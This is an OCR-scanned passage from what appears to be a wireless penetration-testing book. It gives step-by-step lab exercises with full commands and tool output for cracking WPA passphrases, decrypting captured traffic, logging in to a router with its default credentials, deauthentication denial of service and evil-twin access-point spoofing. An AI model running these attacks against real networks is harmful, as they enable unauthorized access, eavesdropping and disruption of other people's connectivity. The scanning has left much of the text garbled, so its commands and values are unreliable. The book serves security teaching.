no. KOJNOK 
no. LESKAR 
no. MARIJKE 
no. MISSIMER 
no. NOGALES 
PETCHY 


1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 





2. We now create a WPA-PSK network with the passphrase sky sign (present in the 
dictionary we used) and capture a WPA-handshake for that network. We now use 
Cowpatt y to crack the WPA passphrase as shown in the following screenshot: 


3. 


rootoot:-# cowpatty 


-d PMK-Wireless-Lab -s "Wireless Lab" -r WPACrackingDemo2-01.cap 


owpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg. com> 


ollected all necessary data to mount crack against WPA/PSK passphrase. 


Starting dictionary attack. 
no. 
no. 
no. 
no. 
no. 
no. 
no. 
no, 
no. 
no. 
no. 
no. 
no. 
no. 
no. 
no. 
no. 
no. 
no, 
no. 
no. 
no. 
no. 
no. 
no. 
no. 


10000: 
20000: 
30000: 
40000: 
50000: 
60000: 
70000: 
80000; 
90000: 


100000: 
110000: 
120000: 
130000: 
140000; 
150000: 
160000: 
170000: 
180000: 
190000: 
200000: 
210000: 
220000: 
230000: 
240000: 
250000: 
260000: 


1 BUDROS 

1 MARIJKE 

1 ZAHRAH 
12h9nch0p5 
11191776127 

3 SALOMON 
4110m012phi5m 
4n4p707ic 
53p4124b13 


5inklik3 
6141231355 
73n3b12i0nid 
Alice Duer 
Bengal rose 
Campbell's 
DAVE PEABOY 
Euphrates 
Goodarzi 
IMPORTANT 
Kleanthes 
MARK KING 
Motorhead 
PRO-200\6 
RON AFFIF 
Scarborough 
Susanvictoria 


Please be patient. 
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It takes approximately 7.18 seconds for Cowpatt y to crack the key, using the pre- 
calculated PMKs as shown in the screenshot: 


. 780000: 
. 790000: 
. 800000: 
. 810000: 
. 820000: 
. 830000: 
. 640000: 
. 850000: 
. 860000: 
. 870000: 
. 880000: 
. 890000: 
. 900000; 
. 910000: 
. 920000; 
. 930000: 
. 940000: 
. 950000: 
. 960000: 
. 970000: 
. 980000: 
. 990000: 


. 1000000: 
. 1010000: 
. 1020000; 
. 1030000: 
. 1040000; 


PSK 


is "sky 


minet-rdm-mil-tac 


mortify 


n0nm47h3m47ici4n 


newparis 
obererei 
onkuisheid 
ossequiosi 


p123d374chm3n7 
p53ud6n9munc13 


passeque 
persecutusque 
pinking iron 


portenderatisque 


presentandoli 
prosperous 
quarter-phase 
rasentato 
reguleerbare 
rhapsodies 
rimescolati 
rivet heater 
sail packet 
scalerebbe 
scredita 


sentence structure 


shemgang 
sky sign 


sign". 


root&bt: — - Shell - Konsole 


1040000 passphrases tested in 7.18 seconds: 144839.60 passphrases/second 


root@bt: 


i 


a! 
*i 
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4. Wenowuseaircrack- ng with the same dictionary file and the cracking 
process takes over 22 minutes. This shows how much we are gaining because 
of the pre-calculation: 


mna root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


Aircrack-ng 1.1 r1738 





35] 979604 keys tested (720.76 k/s) 


KEY FOUND! [ sky sign ] 


Master Key : F7 D6 17 AO 04 
76 4E A3 71 23 


Transient Key : AF 1E FB 44 EB 
C1 AC 98 9C AD 
13 38 61 9A 33 
7B 52 6F D9 42 


EAPOL HMAC : E5 68 7B D7 B7 
root@bt:~# B 





5. In order to use these PMKs with ai r cr ack- ng, we need to use a tool called 
alrolib-ng.Wewill give it the options a! rol i b- ng PMK-Aircrack -- i mport 
cowpatty PMK- Wireless-Lab, where PMK- Ai rcrack istheai rcrack-ng 
compatible database to be created and PMK- Wi rel ess- Lab isthe genpmk 
compliant PMK database, which we had created previously: 


root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 





root@bt:-# airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless-Lab 
Database «PMK-Aircrack» does not already exist, creating it... 
Database «PMK-Aircrack» successfully created 


Reading header... 
Reading... 
Updating references... 





6. We now feed this database to ai rcrack- ng and the cracking process speeds 
up remarkably. The command we useisai rcrack- ng -r PMK-Aircrack 
WPACracki ngDemo2- 01. cap: 
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root@bt: ~ - Shell No. 2 - Konsole 


Session Edit View Bookmarks Settings Help 





Aircrack-ng 1.1 r1738 
26] 1039995 keys tested (39519.65 k/s) 
KEY FOUND! [ sky sign ] 
Master Key : El F7 D6 17 2C 8C AA AO 04 
BF 76 4E A3 CF 7F 48 71 23 
Transient Key : C8 AF 1E FB 30 7F 7D 44 EB 
72 Cl AC 98 5D 40 9C 9C AD 
BB 13 38 61 F0 D3 BE 9A 33 
8C 7B 52 6F 2E BO D4 D9 42 
EAPOL HMAC : 5C E5 68 7B 1C 2F 5C D7 B7 


Quitting aircrack-ng... 
rootGbt:-4t Jj 





7. There are other tools available on BackTrack like, Pyr i t that can leverage 
multi-CPU systems to speed up cracking. We give the pcap filename with the 
-r option and the genpmk compliant PMK file with the - i option. Even on the 
same system used with the previous tools, Pyrit takes around three seconds 
to crack the key, using the same PMK file created using genpmk as shown in the 
following screenshot: 


E root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 











rootabt:-# pyrit -r WPACrackingDemo2-01. cap -i PMK-Wireless-Lab attack_cowpatty 
Pyrit 0.3.1-dev (svn r280) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com 
This code is distributed under the GNU General Public License v3+ 


Parsing file 'WPACrackingDemo2-01.cap' (1/1)... 
Parsed 10 packets (10 802.11-packets), got 1 AP(s) 


Picked AccessPoint 00:21:91:d2:8e:25 automatically... 
Tried 0 PMKs so far; 0 PMKs per second. 
Tried 1179380 PMKs so far; 452746 PMKs per second. 


The password is ‘sky sign’. 


rootebt:~# 
rootebt:-+# J 
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We looked at various different tools and techniques to speed up WPA/WPA2-PSK cracking. 
The whole idea is to pre-calculate the PMK for a given SSID and a list of passphrases in 
our dictionary. 








Decrypting WEP and WPA packets 


In all the exercises, we have done till now, we have cracked WEP and WPA keys using various 
techniques. But what do we do with this information? The first step would be to decrypt 
data packets, we have captured using these keys. 


In the next exercise, we will decrypt the WEP and WPA packets in the same trace file that we 
captured over the air, using the keys we cracked. 





Time for action — decrypting WEP and WPA packets 


1. We will decrypt packets from the same WEP capture file, we created earlier 
WEPCrackingDemo- 01. cap. For this, we will use another tool in the Al rcrack- 
ng suite called Ai rdecap- ng. Werun the following command as shown in the 
following screenshot: ai rdecap- ng -wabcdefabcdefabcdefabcdef 12 
WEPCracki ngDemo- 01. cap, using the WEP key we cracked previously: 


root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCrackingDemo-01.cap 
Total number of packets read 7171 
Total number of WEP data packets 4368 
Total number of WPA data packets 0 


Number of plaintext data packets 0 
Number of decrypted WEP packets 4368 
Number of corrupted WEP packets 0 
Number of decrypted WPA packets 0 
root@bt:-# J 





2. The decypted files are stored in a file named WEPCracki ngDemo- 01- dec. cap. We 
use thet shark utility to view the first ten packets in the file. Please note that, you 
may see something different based on what you captured: 
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ur ©] root@bt: ~ - Shell - Konsole 


Son All Desktops]"" Bookmarks Settings Help 
rootebt:-# tshark -r WEPCrackingDemo-01-dec.cap -c 10 
Running as user "root" and group "root". This could be dangerous. 
.000000 D-Link d2:8e:25 -> Broadcast ARP Who has 192.168.0.198? Tell 192.168.0.1 
.003657 192.168.0.198 -> 192.168.0.1 ICMP Echo (ping) request (id=0x2413, seq(be/le)-1/256, 





.003657 Alfa 3e:bd:93 -» D-Link d2:8e:25 ARP 192.168.0.198 is at 00:c0:ca:3e:bd:93 
.004662 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)-1/256, 
tl=64) 
5 0.008757 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)=2/512, 
tl=64) 
6 0.012854 192.168.0.1 -> 192.168.060.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)=3/768, 


tl-64) 

7 0.013897 192.168.0.198 -> 192.168.0.1 ICMP Echo (ping) request (id=0x2413, seq(be/le)=2/512, 
tl-64) 

8 0.013897 192.168.0.198 -> 192.168.0.1 ICMP Echo (ping) request (id=0x2413, seq(be/le)=3/768, 
tl-64) 

9  À 0.017973 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)-4/1024, 
ttl-64) 

10 0.022069 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)-5/1280, 
ttl-64) 
root(bt :~# 
root@bt :~# 
root@bt:~# J 





3. WPA/WPA2 PSK would work in exactly the same way as with WEP using the 
ai rdecap- ng utility as shown in the following figure, with the al rdecap-ng -p 
abdefgh WPACrackingDemo-01.cap-e "Wireless Lab" command: 


v"; (8 root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 





rootebt:-# airdecap-ng -p abcdefgh WPACrackingDemo-01.cap -e "Wireless Lab" 
[Total number of packets read 4633 
[Total number of WEP data packets 0 
[Total number of WPA data packets 2896 
Number of plaintext data packets 

Number of decrypted WEP packets 

Number of corrupted WEP packets 

Number of decrypted WPA packets 

jroot@bt :~# 

jroot@bt :~# 

root@bt:~# J 








WOAH 
We just saw, how we can decrypt WEP and WPA/WPA2-PSK encrypted packets using 


Airdecap- ng. Itis interesting to note, that we can do the same using Wireshark. We would 
encourage you to explore, how this can be done by consulting the Wireshark documentation. 
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We can also connect to the authorized network after we have cracked the network key. This 
can come in handy, during penetration testing. Logging onto the authorized network with 
the cracked key is the ultimate proof you can provide your client that his network is insecure. 


Time for action - connecting to a WEP network 





1. Usethei wconf i g utility to connect to a WEP network, once you have the key. In a 
past exercise, we broke the WEP key—abcdefabcdefabcdefabcdef 12: 


mna root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


rootabt:-# iwconfig wlanO essid "Wireless Lab" key abcdefabcdefabcdefabcdef12 
root@bt :~# 
rootabt:-# iwconfig wlanO 
wlanO IEEE 802.11bg ESSID:"Wireless Lab" 
Mode:Managed Frequency:2.412 GHz Access Point: 00:21:91:D2:8E:25 
Bit Rate=1 Mb/s Tx-Power=20 dBm 
Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:ABCD-EFAB-CDEF-ABCD-EFAB-CDEF-12 
Power Management: off 
Link Quality-70/70 Signal level--20 dBm 
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 


root@bt :~# 





K 850A. 


We saw how to connect to a WEP network. 
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Time for action - connecting to a WPA network 


1. Inthe case of WPA, the matter is a bit more complicated. The i wconf i g utility cannot 
be used with WPA/WPA2 Personal and Enterprise, as it does not support it. We will 
use a new tool called WPA suppl i cant , for this lab. Touse WPA supplicant fora 
network, we will need to create a configuration file as shown in the screenshot. We 
will name this file wpa- supp. conf: 


Session Edit View Bookmarks Settings Help 


[t WPA-PSK/TKIP 


network={ 
ssid-"Wireless Lab" 
key_mgmt=WPA-PSK 
proto=wPA 
pairwise=TKIP 
group=TKIP 
psk="abcdefgh" 








2. Wewill then invoke the WPA supplicant utility with the following options - Dwext 
-iwlan0 -c wpa-supp. conf to connect to the WPA network, we just cracked 
as shown. Once the connection is successful, WPA suppl i cant will give you a 
message Connection to XXXX compl eted: 


no root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 
root@bt:-# wpa_supplicant -Dwext -iwlan0 -c wpa-supp.conf 


CTRL - EVENT - SCAN - RESULTS 
Trying to associate with 00:21:91:d2:8e:25 (SSID-'Wireless Lab' freq-2412 MHz) 


Associated with 00:21:91:d2:8e:25 
WPA: Key negotiation completed with 00:21:91:d2:8e:25 [PTK-TKIP GTK-TKIP] 
CTRL-EVENT-CONNECTED - Connection to 00:21:91:d2:8e:25 completed (auth) [id-0 id str-] 
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3. For both the WEP and WPA networks, once you are connected, you want to use 
Dhcpclient3 to grab a DHCP address from the network as shown next: 


Lr] root@bt: ~ - Shell No. 3 - Konsole 


rootabt:-# dhclient3 wlan 

There is already a pid file /var/run/dhclient.pid with pid 5308 
killed old client process, removed PID file 

Internet Systems Consortium DHCP Client V3.1.1 

Copyright 2004-2008 Internet Systems Consortium. 

All rights reserved. 

For info, please visit http://www.isc.org/sw/dhcp/ 


mon0: unknown hardware address type 803 

mon0: unknown hardware address type 803 

Listening on LPF/wlan0/00:c0:ca:3e:bd:93 

Sending on  LPF/wlan0/00:c0:ca:3e:bd:93 

Sending on — Socket/fallback 

DHCPREQUEST of 192.168.0.198 on wlanO to 255.255.255.255 port 67 
DHCPACK of 192.168.0.198 from 192.168.0.1 

bound to 192.168.0.198 -- renewal in 37236 seconds. 

rootebt:~# 

root@bt :~# 

root@bt:-# ping 192.168.0.1 

PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data. 

64 bytes from 192.168.0.1: icmp seq-1 ttl-64 time-32.2 ms 

64 bytes from 192.168.0.1: icmp seq-2 ttl-64 time-7.89 ms 

64 bytes from 192.168.0.1: icmp seq-3 ttl-64 time-9.74 ms 

^C 

--- 192.168.0.1 ping statistics --- 

3 packets transmitted, 3 received, 0% packet loss, time 2005ms 
rtt min/avg/max/mdev = 7.893/16.623/32.230/11.062 ms 
rootebt:-# J 
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The default Wi-Fi utility i wconf i g cannot be used to connect to WPA/WPA2 networks. The 
de-facto tool for this is WPA Supplicant.Inthis lab, we saw how we can use it to connect 
to WPA network. 


Pop quiz - WLAN encryption flaws 


1. What packets are used for Packet Replay? 
De-authentication packet 


a 
b. Associated packet 


p 


Encrypted ARP packet 


d. None ofthe above 


EEX K 


2. 


3. 
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WEP can be cracked: 


a 
b. 
C. 
d. 


Always 
Only when a weak key/passphrase is chosen 
Under special circumstances only 


Only if the access point runs old software 


WPA can be cracked: 


a 
b. 
C. 
d. 


Always 
Only if a weak key/passphrase is chosen 
If the client contains old firmware 


Even with no client connected to the wireless network 


In this chapter, we have learnt the following about WLAN encryption: 


€ WEP is flawed and no matter what the WEP key is, with enough data packet samples 
it is always possible to crack WEP. 


* 


WPA/WPA2 is cryptographically un-crackable currently, however, under special 
circumstances, such as when a weak passphrase is chosen in WPA/WPA2-PSK, it is 
possible to retrieve the passphrase using dictionary attacks. 


In the next chapter, we will look at different attacks on the WLAN Infrastructure, 
such as rogue access points, evil twins, bit flipping attacks, and so on. 


deb 





OWESISKA EIL Wick 3 er 
Infrastructure 





"Thus, what is of supreme importance in war is to attack the enemy's strategy" 
ql Sun Tzu, Art of War 


` In this chapter, we will attack the WLAN infrastructure's core! We will focus on 
how we can penetrate into the authorized network by using various new attack 
vectors and also how we can lure authorized clients to connect to us, as an 
attacker. 


The WLAN infrastructure is what provides wireless services to all the WLAN clients in a 
system. In this chapter, we will look at various attacks which can be conducted against 
the infrastructure: 

Default accounts and credentials on the access point 

Denial of service attacks 


Evil twin and access point MAC spoofing 


©% ¢ 9 9 


Rogue access points 


WLAN access points are the core building blocks of the infrastructure. Even though they play 
such an important role, they are sometimes the most neglected in terms of security. In this 
exercise, we will check if the default passwords have been changed on the access point or 
not. Then we will go on to verify that even if the passwords have been changed, they are still 
easy to guess and crack using a dictionary-based attack. 


Attacks on the WLAN Infrastructure 


It is important to note that as we move on into more advanced chapters, it will be assumed 
that you have gone through the previous chapters and are now familiar with the use of 

all the tools discussed there. This will allow us to build on that knowledge and try more 
complicated attacks! 


Time for action — cracking default accounts on the access 


LH 


Follow these instructions to get started: 





1. Let us first connect to our access point Wireless Lab. We see that the access point 
model is D-Link DIR-615 as shown in the following screenshot: 


Product Page: DIR-615 Hardware Version: B2 Firmware Version: 2.23 


Log in to the router: 


User Name: Admin ~v 


Password : 


WIRELESS 


Copyright © 2004-2007 D-Link Systems, Inc. 





2. From the manufacturer's website, we find the default account credentials for Admin 
is blank that is, no password. We try this on the login page and we succeed in 
logging in. This shows how easy it is to break into accounts with default credentials. 
We would highly encourage you to obtain the router's user manual online. This will 
allow you to understand what you are dealing with during the penetration test and 
give you an insight into other configuration flaws you could check for. 


Chapter 5 


Product Page: DIR-615 Hardware Version: B2 Firmware Version: 2.23 


SETUP ADVANCED TOOLS STATUS SUPPORT 


Helpful Hints 


W sO SE WisS - If yo are new to 

WIRELESS SETTINGS There are two ways to set up your Internet connection: you can use the Web-based Internet air ü pie rue 

NETWORK SETTINGS Connection Setup Wizard, or you can manually configure the connection. never configured a router 
before, dick on Internet 


Connection Setup 


INTERNET CONNECTION SETUP WIZARD Wizard and the router will 
guide you through a few 
. . ; . . simple steps to get your 
If you would like to utilize our easy to use Web-based Wizards to assist you in connecting your network up and running. 


new D-Link Systems Router to the Internet, click on the button below. 
If you consider yourself an 


Internet Connection Setup Wizard advanced user and have 
configured a router 


f : . before, dick Manual 
Note: Before launching these wizards, please make sure you have followed all steps outlined in Internet Connection 


the Quick Installation Guide included in the package. Setup to input all the 


settings manually. 


MANUAL INTERNET CONNECTION OPTIONS 


If you would like to configure the Internet settings of your new D-Link Systems Router manually, 
then click on the button below. 


WIRELESS 


Copyright © 2004-2007 D-Link Systems, Inc. 
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We verified that at times default credentials are never changed on the access point, and this 


could lead to a full system compromise. Also, even if the default credentials are changed, it 
should not be something which is easy to guess or run a simple dictionary-based attack on. 





Have a go hero — cracking accounts using bruteforce attacks 





In the previous exercise, change the password to something hard to guess or find in a 
dictionary and see if you can crack it using a Bruteforce approach. Limit the length and 
characters in the password, so that you can succeed at some point. One of the most common 
tools used to crack HTTP authentication is called Hydra available on BackTrack. 


Attacks on the WLAN Infrastructure 


WLANs are prone to Denial of Service (DoS) attacks using various techniques, including but 
not limited to: 


De-Authentication attack 
Dis-Association attack 
CTS-RTS attack 


* 
* 
* 
* 


In the scope of this book, we will discuss De-Authentication attacks on the Wireless LAN 
infrastructure using the following experiment: 


Signal interference or spectrum jamming attack 


Time for action — De-Authentication DoS attack 


Follow these instructions to get started: 





1. Letusconfigure out Wireless Lab network to use Open Authentication and no 
encryption. This will allow us to see the packets using Wireshark easily: 


Product Page: DIR-615 Hardware Version: B2 Firmware Version: 2.23 


SETUP ADVANCED TOOLS STATUS SUPPORT 


INTERNET Helpful Hints... 
s : : E : Ch your Wireless 
Use this section to configure the wireless settings for your D-Link Router. Please note that N seat basa is Ace 
changes made on this section may also need to be duplicated on your Wireless Client. step in searing your 
: E : wireless network. Change 
Don't Save Settings it to a familiar name that 
does not contain any 
personal information. 


WIRELESS SETTINGS 


NETWORK SETTINGS 


WIRELESS NETWORK SETTINGS 


Enable Auto Channel Scan 
so that the router can 


. select the best possible 
Enable Wireless : || Always v channel for your wireless 


network to operate on. 





Wireless Network Name: Wireless Lab (Also called the SSID) 
Enabling Hidden Mode is 
802.11 Mode: Mixed 802.11n, 802. 11g and 802.11b ~ another way to secure 
| your network. With this 
Enable Auto Channel Scan : | option enabled, no wireless 
Wireless Channel: 2.462GHz-CHii v dients will be able to see 
your wireless network 
Transmission Rate : Best (automatic) + (Mbit/s) when they scan to see 
what's available. For your 
Channel Width: 20 MHz v wireless devices to connect 
. ddh aii : to your router, you will 
Visibility Status: © Visible Invisible need to manually enter the 
Wireless Network Name on 
each device. 
WIRELESS SECURITY MODE dee 
Wireless Security, make 
To protect your privacy you can configure wireless security features. This device supports three sure you write down the 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original Key or Passphrase that 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not you have configured. You 
require an authentication server. The WPA-Enterprise option requires an external RADIUS server. | MLMssdlc Lucus 
information on any wireless 
device that you connect to 


Security Mode : None Y your wireless network. 


WIRELESS 
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2. Let us connect a Windows client to the access point. We will see the connection in 
theai rodump- ng screen: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


CH 11 ][ Elapsed: 20 s ][ 2011-03-05 06:50 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:21:91:D2:8E:25 -9 100 203 4 0 11 54 . OPN Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -35 0 -36e 251 8 





3. Now onthe attacker machine, let us run a directed De-Authentication attack 
against this: 


root@bt: ~ - Shell - Konsole <2> 
Session Edit View Bookmarks Settings Help 


:~# aireplay-ng --deauth 1 -a 00:21:91:D2:8E:25 -h 00:21:91:D2:8E:25 -c 60:FB:42:D5:E4:01 mond 
[The interface MAC (80:C0:CA:3E:BD:93) doesn't match the specified MAC (-h). 
ifconfig monO hw ether 00:21:91:D2:8E:25 
(06:57:59 Waiting for beacon frame (BSSID: 00:21:91:D2:8bE:25) on channel 11 
(06:58:00 Sending 64 directed DeAuth. STMAC: [60:FB:42:D5:E4:01] [ 2|]63 ACKs] 





4. Note how the client gets disconnected from the access point completely. We can 
verify the same on theai rodump- ng screen as well: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 32 s ][ 2011-03-05 07:00 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:21:91:D2:8E:25 -6 73 315 0 0 11 54e. OPN Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 
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2. 


packets over the air which we just sent: 


552 10.443725 
553 10.446512 
354 10.442709 
Sov 10. 448080 
556 10.450161 
557 10.446525 
558 10.450170 
229 10.422807 
560 10.452815 
561 10.455697 
S62 10.457106 
363 10.429646 
564 10.483061 
565 10.457116 
566 10.459655 
26/ 10.464796 
S68 10. 4871646 
569 10.464807 
570 10. 467175 
271 10.471341 
572 10.471545 


Shanghai 53:02:fc 
60:fb:42:d5:e4:01 
D-Link _d2:Ge:25 


D-Link d2:8e:25 
60: fb:42:d5:e4:01 
D-Link d2:0e:25 
60: fb:42:d5:e4;01 
60:fb:42:d5:e4:01 


D-Link d2:0e:25 
60:fb:42:d5;e4:01 


D-Link d2:8e:25 
60:fb:42:0d5:e4:01 
D-Link d2:8e:25 
80:fb:42:d5:e4:01 
D-Link d2:8e:25 
60: fb:42:d5:64:01 
D-Link d2:8e;25 


Broadcast 

D-Link d2:86e:25 
60:tb:42:d5:e4:01 
60: fb:42:d5:e4:01 
60: fb:42:d5:e4:01 
D-Link d2:86e:25 
60: tb:42:d5:e4:01 
D-Link d2:8e;25 
D-Link d2:8e:25 
60:fb:42:d5:e4:01 
60:tb:42:d5:e4:01 
D-Link d2:8e;25 
80:1b:42:d5:e4:01 
60: fb:42:d5:e4:01 
D-Link d2:8e:25 
60; fb:42:d5:e4:01 
D-Link d2:8e:25 
60:fb:42:d5:e4:01 
D-Lank_d2:Ge:25 
60:4b:42:d5:e4:01 


Frame 554 (39 bytes on wire, 39 bytes captured) 
Radiotap Header vO, Length 13 

IEEE B02.11 Deauthentication, Flags: 
IEEE 802.11 wireless LAN management frame 


000 00 OO Od OO O4 BO O2 OO 02 00 O1 OO O1 cO OO 3s 
o1 


10 0l 60 fb 42 dS e4 
20 d? Be 25 af 06 07 


File: *Amp/etherXxxxk LXdFH* 136 K.. 2 


on 


GO 21 91 d2 8e 75 00 21 1 


(Untitied) - Wireshark 


SHAH BaEXx2ereseu Ft BH Raana B 


IEEE 802 Deauthentication, 
IEEE B02 Deauthentacation, 


IEEE 802 Acknowledgement, 


IEEE 807 Deauthenticatioan, 
IEEE 802 Deauthentication, 
IEEE 902 Deauthentication, 
IEEE 802 Deauthentication, 
IFEE 807 Deauthenticatron, 


IEEE 802 Acknowledgement, 


IGGE 802 Deauthentication, 
IEEE 892 Deauthentication, 


IEEE 802 Acknowledgement, 


IEEE 802 Deauthentication, 
IEEE 802 Deauthentication, 
IEEE 392 Deauthentication, 
IEEE 802 Deauthentication, 
IEEE 02 Deauthentication, 
IEEE B02 Deauthentication, 
IEEE 892 Deauthentication, 


Packets: 905 Displayed: 905 Marked: 0 Dropped: 0 


SN=107, 
3N-106, 
Flags 

SN=108, 
SN=107, 
SN-100, 

SN- 1089, 
£Nz1095, 
Flagss........ 
SN-110, 
SN-111, 
Flagsz... 
SN=110, 
SN=111, 
SN-112, 
©N=113, 
SN=112, 
SN=113, 
SN-114, 


FN=0, 


C 


FN-0, Flags- 
FN-0, Flags 


FLOORS. Li eva 


If we use Wireshark to see the traffic, you will notice a lot of De-Authentication 





‘| Profile: Defauk 


6. Wecando the same attack by sending a Broadcast De-Authentication packet on 
behalf of the access point to the entire wireless network. This will have the effect of 
disconnecting all connected clients: 


Session Edit View Bookmarks Settings Help 


root@bt: ~ - Shell - Konsole <2> 





root@bt:-# aireplay-ng --deauth 0 -a 00:21:91:D2:8E: 
The interface MAC (00:C0:CA:3E:BD:93) doesn't match 


ifconfig monO hw ether 00:21:91:D2:8E:25 


07:03:54 Waiting for beacon frame (BSSID: 00:21:91: 


NB: this attack is more effective when targeting 


a connected wireless client 


(-c «client's mac»). 


25 -h 00:21:91:D2:8E:25 mond 
the specified MAC (-h). 


D2:8E:25) on channel 11 


BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 


broadcast -- 
broadcast 
broadcast 
broadcast 
broadcast 


DeAuth to 
DeAuth to 
DeAuth to 
DeAuth to 
DeAuth to 
DeAuth to broadcast 
DeAuth to broadcast 
DeAuth to broadcast 
DeAuth to broadcast 
DeAuth to broadcast 


07:03: Sending 
07:03: Sending 
07:03: Sending 
07:03: Sending 
07:03: Sending 
07:03: Sending 
07:03: Sending 
07:03: Sending 
07:03: Sending 
07:03: Sending 


[00: 
[00: 
[00: 
[00: 
[00: 
[00: 
[00: 
[00: 
[00: 


:25] 
:25] 
:25] 
:25] 
:25] 
:25] 
:25] 
: 25] 
: 25] 
: 25] 
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We successfully sent De-Authentication frames to both the access point and the client. This 
has resulted in getting them disconnected and a full loss of communication between them. 





We have also sent out Broadcast De-Authentication packets, which will ensure that no client 
in the vicinity can successfully connect to our access point. 


It is important to note that as soon as the client is disconnected it will try to connect back 
once again to the access point, and thus the De-Authentication attack has to be carried out 
in a sustained way to have a full Denial of Service effect. 


This is one of the easiest attacks to orchestrate but has the most devastating effect. This 
could be easily used in the real world to bring a wireless network down to its knees. 





Try and check how you can conduct Dis-Association attacks against the infrastructure using 
tools available on BackTrack. Can you do a broadcast Dis-Association attack? 


One of the most potent attacks on WLAN infrastructures is the Evil Twin. The idea is to 
basically introduce an attacker-controlled access point in the vicinity of the WLAN network. 
This access point will advertise the exact same SSID as the authorized WLAN network. 


Many wireless users may accidently connect to this malicious access point thinking it is part 
of the authorized network. Once a connection is established, the attacker can orchestrate a 
man-in-the-middle attack and transparently relay traffic while eavesdropping on the entire 
communication. We will look at how a man-in-the-middle attack is done in a later chapter. In 
the real world, an attacker would ideally use this attack close to the authorized network, so 
that the user gets confused and accidently connects to his network. 


An evil twin having the same MAC address as an authorized access point is even more 
difficult to detect and deter. This is where access point MAC spoofing comes in! In the 
next experiment, we will look at how to create an evil twin, coupled with access point 
MAC spoofing. 
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Time for action — evil twin with MAC spoofing 


Follow these instructions to get started: 


1. Useairodump- ng to locate the access point's BSSID and ESSID which we would like 
to emulate in the evil twin: 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


CH 2 ][ Elapsed: 0 s ][ 2011-03-05 08:31 
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:1E:40:53:02:FC -46 2 0 0 11 54 WPA TKIP PSK vivek 
66:21:91:D2:8E:25 -33 4 0 0 11 54. OPN Wireless Lab 


BSSID STATION Rate Lost Packets Probes 


^L 
rootabt:-s J 


no root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: © s ][ 2011-03-05 08:33 
BSSID PWR RXQ Beacons ENC CIPHER AUTH ESSID 


00:22:7F:65:0A:99 -67 . WPA2 CCMP MGT «length: 602 
00:17:7C:09:CF:10 -70 WPA TKIP  PSK Sunny 
00:1E:40:53:02:FC -40 WPA TKIP PSK vivek 
00:21:91:D2:8E:25 -18 . OPN Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 
00:21:91:D2:8bE:25 60:FB:42:D5:E4:01 -20 0 -36e 575 11 Vivek 


aC 
rootebt:~# Bi 





3. Using this information, we create a new access point with the same ESSID but 
different BSSID and MAC address using the a! rbase- ng command: 


root@bt: ~ - Shell - Konsole <2> 
Session Edit View Bookmarks Settings Help 


root@ot:-# airbase-ng -a AA:AA:AA:AA:AA:AA --essid "Wireless Lab" -c 11 mond 
08:36:20 Created tap interface at0 


08:36:20 Trying to set MTU on atO to 1500 
08:36:20 Access Point with BSSID AA:AA:AA:AA:AA:AA started. 





tex ok 
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4. This new access point also shows up in the ai rodump- ng screen. It is important to 
note that you will need to runai rodump- ng in a new window with the following 
commandairodump-ng --channel 11 wl an0 to see this new access point: 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: © s ][ 2011-03-05 08:39 


BSSID PWR RXQ Beacons #Data, #/s ENC CIPHER AUTH ESSID 


TKIP 
TKIP 


-70 0 WPA 
WPA 
OPN 


. OPN 


PSK 
PSK 


Sunny 

vivek 
Wireless Lab 
Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 
00:21:91:D2:8E:25 
^C 

root@bt:-# J 


60:FB:42:D5:E4:01 -21 0 -36e 159 2 





5. Now we send a De-Authentication frame to the client, so it disconnects and 
immediately tries to re-connect: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


roota@bt:-# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mond 

08:41:02 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11 
NB: this attack is more effective when targeting 

a connected wireless client (-c <client's mac>). 





08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
